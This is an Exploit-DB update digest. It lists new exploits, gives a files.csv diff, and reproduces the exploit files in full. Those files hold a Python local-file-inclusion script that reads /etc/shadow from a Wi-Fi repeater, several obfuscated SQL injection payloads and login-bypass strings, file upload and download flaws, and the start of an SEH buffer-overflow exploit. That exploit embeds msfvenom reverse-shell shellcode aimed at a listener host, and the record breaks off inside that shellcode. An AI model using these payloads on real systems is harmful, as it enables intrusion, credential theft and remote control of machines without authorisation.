DB: 2017-08-29

21 new exploits

Easy DVD Creator 2.5.11 - Buffer Overflow (SEH)
Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)
Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)
Dup Scout Enterprise 9.9.14 - Buffer Overflow (SEH)
Disk Savvy Enterprise 9.9.14 - Buffer Overflow (SEH)
Sync Breeze Enterprise 9.9.16 - Buffer Overflow (SEH)
Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)

Joomla! Component MasterForms 1.0.3 - SQL Injection
Joomla! Component Photo Contest 1.0.2 - SQL Injection

Wireless Repeater BE126 - Local File Inclusion
Joomla! Component OSDownloads 1.7.4 - SQL Injection
AutoCar 1.1 - 'category' Parameter SQL Injection
Joomla! Component Responsive Portfolio 1.6.1 - SQL Injection
Matrimonial Script 2.7 - Authentication Bypass
Smart Chat 1.0.0 - SQL Injection
FTP Made Easy PRO 1.2 - SQL Injection
WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download
Easy Web Search 4.0 - SQL Injection
PHP Search Engine 1.0 - SQL Injection
Flash Poker 2.0 - 'game' Parameter SQL Injection
Login-Reg Members Management PHP 1.0 - Arbitrary File Upload
Schools Alert Management Script - Authentication Bypass

files.csv

@@ -9217,6 +9217,9 @@ id,file,description,date,author,platform,type,port
 42538,platforms/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
 42539,platforms/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
 42540,platforms/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,windows,local,0
+42565,platforms/windows/local/42565.py,"Easy DVD Creator 2.5.11 - Buffer Overflow (SEH)",2017-08-26,tr0ubl3m4k3r,windows,local,0
+42567,platforms/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
+42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15774,6 +15777,10 @@ id,file,description,date,author,platform,type,port
 42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0
 42484,platforms/windows/remote/42484.html,"Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)",2017-08-18,"Hans Jerry Illikainen",windows,remote,0
 42541,platforms/php/remote/42541.rb,"IBM OpenAdmin Tool - SOAP welcomeServer PHP Code Execution (Metasploit)",2017-08-22,Metasploit,php,remote,0
+42557,platforms/windows/remote/42557.py,"Dup Scout Enterprise 9.9.14 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
+42558,platforms/windows/remote/42558.py,"Disk Savvy Enterprise 9.9.14 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
+42559,platforms/windows/remote/42559.py,"Sync Breeze Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
+42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -36922,7 +36929,7 @@ id,file,description,date,author,platform,type,port
 39150,platforms/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0
 42552,platforms/php/webapps/42552.txt,"Joomla! Component Bargain Product VM3 1.0 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
 42553,platforms/php/webapps/42553.txt,"Joomla! Component Price Alert 3.0.2 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
-42554,platforms/php/webapps/42554.txt,"Joomla! Component MasterForms 1.0.3 - SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0
+42563,platforms/php/webapps/42563.txt,"Joomla! Component Photo Contest 1.0.2 - SQL Injection",2017-08-25,"Ihsan Sencan",php,webapps,0
 39153,platforms/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0
 39156,platforms/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
 39157,platforms/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
@@ -38040,6 +38047,7 @@ id,file,description,date,author,platform,type,port
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
+42547,platforms/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps,0
 42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
 42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
 42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0
@@ -38343,3 +38351,15 @@ id,file,description,date,author,platform,type,port
 42533,platforms/php/webapps/42533.txt,"PHP-Lance 1.52 - 'subcat' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42534,platforms/php/webapps/42534.txt,"PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42535,platforms/php/webapps/42535.txt,"PHPMyWind 5.3 - Cross-Site Scripting",2017-08-21,小雨,php,webapps,0
+42561,platforms/php/webapps/42561.txt,"Joomla! Component OSDownloads 1.7.4 - SQL Injection",2017-08-25,"Ihsan Sencan",php,webapps,0
+42562,platforms/php/webapps/42562.txt,"AutoCar 1.1 - 'category' Parameter SQL Injection",2017-08-25,"Bora Bozdogan",php,webapps,0
+42564,platforms/php/webapps/42564.txt,"Joomla! Component Responsive Portfolio 1.6.1 - SQL Injection",2017-08-25,"Ihsan Sencan",php,webapps,0
+42566,platforms/php/webapps/42566.txt,"Matrimonial Script 2.7 - Authentication Bypass",2017-08-27,"Ali BawazeEer",php,webapps,0
+42569,platforms/php/webapps/42569.txt,"Smart Chat 1.0.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
+42570,platforms/php/webapps/42570.txt,"FTP Made Easy PRO 1.2 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
+42571,platforms/php/webapps/42571.txt,"WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download",2017-08-28,"Ihsan Sencan",php,webapps,0
+42572,platforms/php/webapps/42572.txt,"Easy Web Search 4.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
+42573,platforms/php/webapps/42573.txt,"PHP Search Engine 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
+42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
+42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0
+42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0

platforms/hardware/webapps/42547.py

@@ -0,0 +1,64 @@
+# Exploit Title:  WIFI Repeater BE126 – Local File Inclusion
+# Date Publish: 23/08/2017
+# Exploit Authors: Hay Mizrachi, Omer Kaspi
+
+# Contact: haymizrachi@gmail.com, komerk0@gmail.com
+# Vendor Homepage: http://www.twsz.com
+# Category: Webapps
+# Version: 1.0
+# Tested on: Windows/Ubuntu 16.04
+
+# CVE: CVE-2017-8770
+
+1 - Description:
+
+'getpage' HTTP parameter is not escaped in include file,
+
+Which allow us to include local files with a root privilege user, aka /etc/password,
+/etc/shadow and so on.
+
+2 - Proof of Concept:
+
+http://Target/cgi-bin/webproc?getpage=[LFI]
+
+ 
+
+/etc/passwd:
+
+http://Target/cgi-bin/webproc?getpage=../../../../etc/passwd&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard
+
+
+#root:x:0:0:root:/root:/bin/bash
+
+root:x:0:0:root:/root:/bin/sh
+
+#tw:x:504:504::/home/tw:/bin/bash
+
+#tw:x:504:504::/home/tw:/bin/msh
+
+ 
+
+/etc/shadow;
+
+ 
+
+http://Target/cgi-bin/webproc?getpage=../../../../etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard
+
+ 
+
+import urllib2, httplib, sys
+ 
+'''
+	LFI PoC By Hay and Omer
+'''
+ 
+print "[+] cgi-bin/webproc exploiter [+]"
+print "[+] usage: python " + __file__ + " http://<target_ip>"
+ 
+ip_add = sys.argv[1]
+fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n')
+ 
+print "Exploiting....."
+print '\n'
+URL = "http://" + ip_add + "/cgi-bin/webproc?getpage=/" + fd + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard"
+print urllib2.urlopen(URL).read()

platforms/php/webapps/42554.txt

@@ -1,27 +0,0 @@
-# # # # # 
-# Exploit Title: Joomla! Component MasterForms 1.0.3 - SQL Injection
-# Dork: N/A
-# Date: 25.08.2017
-# Vendor Homepage: https://masterformsbuilder.com/
-# Software Link: https://www.joomlamasterforms.com/download?file=masterforms_v.1.0.3_j3.3.zip
-# Demo: https://demo.masterformsbuilder.com/
-# Version: 1.0.3
-# Category: Webapps
-# Tested on: WiN7_x64/KaLiLinuX_x64
-# CVE: N/A
-# # # # #
-# Exploit Author: Ihsan Sencan
-# Author Web: http://ihsan.net
-# Author Social: @ihsansencan
-# # # # #
-# Description:
-# The vulnerability allows an attacker to inject sql commands....
-# 	
-# Proof of Concept:
-# 
-# http://localhost/[PATH]/index.php?option=com_masterforms&layout=form&formid=[SQL]
-#
-# 1'+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+-
-#
-# Etc..
-# # # # #

platforms/php/webapps/42561.txt

@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Joomla! Component OSDownloads 1.7.4 - SQL Injection
+# Dork: N/A
+# Date: 25.08.2017
+# Vendor Homepage: https://joomlashack.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/osdownloads/
+# Demo: https://demoextensions.joomlashack.com/osdownloads
+# Version: 1.7.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_osdownloads&view=item&id=[SQL]
+#
+# 8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
+#
+# Etc..
+# # # # #

platforms/php/webapps/42562.txt

@@ -0,0 +1,23 @@
+# #
+# Exploit Title: Auto Car - Car listing Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 25.08.2017
+# Vendor: http://kamleshyadav.com/
+# Software Link: https://codecanyon.net/item/auto-car-car-listing-script/19221368
+# Demo: http://kamleshyadav.com/scripts/autocar_preview/
+# Version: 1.1
+# Tested on: WiN10_X64
+# Exploit Author: Bora Bozdogan
+# Author WebSite : http://borabozdogan.net.tr
+# Author E-mail : borayazilim45@mit.tc
+# #	
+# POC:
+# 
+# http://localhost/[PATH]/search-cars?category=[SQL]
+# ts_user
+#  user_uname
+#  user_fname
+#  user_lname
+#  user_email
+#  user_pwd
+# #

platforms/php/webapps/42563.txt

@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection
+# Dork: N/A
+# Date: 25.08.2017
+# Vendor Homepage: http://keenitsolution.com/
+# Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866
+# Demo: http://photo.keenitsolution.com/
+# Version: 1.0.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/photo-contest/photocontest/vote?controller=photocontest&vid=[SQL]
+#
+# 1'aND+(/*!22200sEleCT*/+1+/*!22200FrOM*/+(/*!22200sEleCT*/+cOUNT(*),/*!22200CoNCAt*/((/*!22200sEleCT*/(/*!22200sEleCT*/+/*!22200CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!22200FrOM*/+infOrMation_schEma.tables+where+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!22200FrOM*/+infOrMation_schEma.tABLES+/*!22200gROUP*/+bY+x)a)+aND+''='
+#
+# Etc..
+# # # # #

platforms/php/webapps/42564.txt

@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Joomla! Component RPC - Responsive Portfolio 1.6.1 - SQL Injection
+# Dork: N/A
+# Date: 25.08.2017
+# Vendor Homepage: https://extro.media/
+# Software Link: https://extensions.joomla.org/extension/rpc-responsive-portfolio/
+# Demo: https://demo.extro.media/responsive-joomla-extensions-en/video-en
+# Version: 1.6.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL]
+#
+# Etc..
+# # # # #

platforms/php/webapps/42566.txt

@@ -0,0 +1,49 @@
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
+
+<!-- 
+# Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass
+# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
+# Dork: N/A
+# Date: 27.08.2017
+# Vendor Homepage: http://www.scubez.net/
+# Software Link: http://www.mscript.in/
+# Version: 2.7
+# Category: Webapps
+# Tested on: windows 7 / mozila firefox 
+# supporting tools for testing : No-Redirect Add-on in firefox
+#
+--!>
+
+# ========================================================
+#
+#
+# admin panel Authentication bypass 
+# 
+# Description : An Attackers are able to completely compromise the web application built upon
+# Matrimonial Script as they can gain access to the admin panel and  manage the website as an admin without
+# prior authentication!
+# 
+# Proof of Concept : - 
+# Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
+# Step 2: Access http://example.com/path/admin/index.php
+# 
+# 
+# Risk : Unauthenticated attackers are able to gain full access to the administrator panel
+# and thus have total control over the web application, including content change,add admin user .. etc
+#
+#
+#
+#
+# ========================================================
+# [+] Disclaimer
+#
+# Permission is hereby granted for the redistribution of this advisory,
+# provided that it is not altered except by reformatting it, and that due
+# credit is given. Permission is explicitly given for insertion in
+# vulnerability databases and similar, provided that due credit is given to
+# the author. The author is not responsible for any misuse of the information contained 
+# herein and prohibits any malicious use of all security related information
+# or exploits by the author or elsewhere.
+#
+#
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

platforms/php/webapps/42569.txt

@@ -0,0 +1,30 @@
+# # # # # 
+# Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass
+# Dork: N/A
+# Date: 28.08.2017
+# Vendor Homepage: http://codesgit.com/
+# Software Link: https://www.codester.com/items/997/smart-chat-php-script
+# Demo: http://demos.codesgit.com/smartchat/
+# Version: 1.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/admin.php
+# User: 'or 1=1 or ''=' Pass: anything
+# 
+# http://localhost/[PATH]/index.php?p=smiles&handel=[SQL]
+#
+# '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+-
+#
+# Etc...
+# # # # #

platforms/php/webapps/42570.txt

@@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection
+# Dork: N/A
+# Date: 28.08.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747
+# Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/admin-ftp-del.php?id=[SQL]
+# http://localhost/[PATH]/admin-ftp-change.php?id=[SQL]
+#
+# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
+#
+# Etc..
+# # # # #

platforms/php/webapps/42571.txt

@@ -0,0 +1,44 @@
+# # # # # 
+# Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download
+# Dork: N/A
+# Date: 28.08.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022
+# Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The security obligation allows an attacker to arbitrary download files..
+#
+# Vulnerable Source:
+#
+# .............
+# <?php
+# $file = base64_decode($_GET['id']);
+# 
+# if (file_exists($file)) {
+#     header('Content-Description: File Transfer');
+#     header('Content-Type: application/octet-stream');
+#     header('Content-Disposition: attachment; filename="'.basename($file).'"');
+#     header('Expires: 0');
+#     header('Cache-Control: must-revalidate');
+#     header('Pragma: public');
+#     header('Content-Length: ' . filesize($file));
+#     readfile($file);
+#     exit;
+# }
+# ?>
+# .............
+# Proof of Concept:
+#
+# http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64]
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42572.txt

@@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Easy Web Search 4.0 - SQL Injection
+# Dork: N/A
+# Date: 28.08.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164
+# Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/
+# Version: 4.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/admin/admin-delete.php?id=[SQL]
+# http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL]
+#
+# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
+#
+# Etc..
+# # # # #

platforms/php/webapps/42573.txt

@@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: PHP Search Engine 1.0 - SQL Injection
+# Dork: N/A
+# Date: 28.08.2017
+# Vendor Homepage: http://nelliwinne.net/
+# Software Link: https://www.codester.com/items/2975/php-search-engine-mysql-based-simple-site-search
+# Demo: http://codester.nelliwinne.net/PHPSearchEngine/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/go.php?id=[SQL]
+# http://localhost/[PATH]/admin-delete.php?id=[SQL]
+#
+# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
+#
+# Etc..
+# # # # #

platforms/php/webapps/42574.txt

@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Flash Multiplayer Poker PHP Script 2.0 - SQL Injection
+# Dork: N/A
+# Date: 28.08.2017
+# Vendor Homepage: http://www.flashpoker.it/
+# Software Link: https://www.codester.com/items/559/flash-poker-v2-multiplayer-poker-php-script
+# Demo: http://www.flashpoker.it/index/
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?act_value=pkr_www&sub_act_value=pkr_viewgamehistory&game=[SQL]
+#
+# 1+Or+0x31+gRoUp+bY+ConCAT_WS(0x3a,VeRsiON(),fLoOR(rAnD(0)*2))+hAvING+MIn(0)+OR+0x31
+#
+# Etc..
+# # # # #

platforms/php/webapps/42575.txt

@@ -0,0 +1,38 @@
+# # # # #
+# Exploit Title: Login-Reg Members Management PHP 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 28.08.2017
+# Vendor Homepage : https://www.codester.com/user/mostalo
+# Software Link: https://www.codester.com/items/627/login-reg-members-management-php
+# Demo: http://0log.890m.com/log/signup.php
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker upload arbitrary file....
+#
+# Vulnerable Source:
+# .....................
+# if ($_FILES['profile_pic']['size'] == 0){$rr2 = "no file";}
+# if (is_uploaded_file($_FILES["profile_pic"]["tmp_name"])) {
+# $filename = time() . '_' . $_FILES["profile_pic"]["name"];
+# $filepath = 'profile_pics/' . $filename;
+# if (!move_uploaded_file($_FILES["profile_pic"]["tmp_name"], $filepath)) {
+# $error = "select img";
+# .....................
+# 	
+# Proof of Concept:
+# 
+# Users profile picture arbitrary file can be uploaded ..
+# 
+# http://localhost/[PATH]/signup.php
+# http://localhost/[PATH]/profile_pics/[ID_FILE].php
+# 
+# Etc...
+# # # # #

platforms/php/webapps/42578.txt

@@ -0,0 +1,46 @@
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
+
+<!-- 
+# Exploit Title:  Schools Alert Management - SQL injection login bypass 
+# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
+# Dork: N/A
+# Date: 28.08.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/product/schools-alert-management-system/
+# Version: 2.01
+# Category: Webapps
+# Tested on: windows64bit / mozila firefox 
+# 
+#
+--!>
+
+# ========================================================
+#
+#
+# Schools Alert Management - SQL injection login bypass 
+# 
+# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school
+# 
+# Proof of Concept : - 
+# 
+# http://localhost/schoolalert/demo_school_name/schools_login.php  [ set username and password ] to >>  admin' or 1=1 -- - 
+#  you must choose the check box as management 
+#   
+# 
+# 
+#
+# Risk : authenticated attacker maybe starting posting item in the site or compromise the site 
+#
+#
+# ========================================================
+# [+] Disclaimer
+#
+# Permission is hereby granted for the redistribution of this advisory,
+# provided that it is not altered except by reformatting it, and that due
+# credit is given. Permission is explicitly given for insertion in
+# vulnerability databases and similar, provided that due credit is given to
+# the author. The author is not responsible for any misuse of the information contained 
+# herein and prohibits any malicious use of all security related information
+# or exploits by the author or elsewhere.
+#
+#
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

platforms/windows/local/42565.py

@@ -0,0 +1,61 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title:        Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)
+# Date:                 26-08-2017
+# Exploit Author:       tr0ubl3m4k3r
+# Vulnerable Software:  Easy DVD Creator
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              2.5.11
+# Software Link:        http://www.divxtodvd.net/easy_dvd_creator.exe
+# Tested On:            Windows 10 64bit
+#
+# Credit to Muhann4d for discovering the PoC (41911).
+#
+# To reproduce the exploit:
+#	1. Click Register
+#	2. In the "Enter User Name" field, paste the content of exploit.txt
+#
+##############################################################################
+
+
+buffer = "\x41" * 988
+nSEH = "\xeb\x09\x90\x90"
+
+# 0x10037859 : pop ebx # pop eax # ret  | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] 
+# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files (x86)\Easy MOV Converter\SkinMagic.dll)
+
+SEH = "\x59\x78\x03\x10"
+junk = "\x90"*16
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.105 LPORT=443
+# -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
+
+shellcode = ("\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
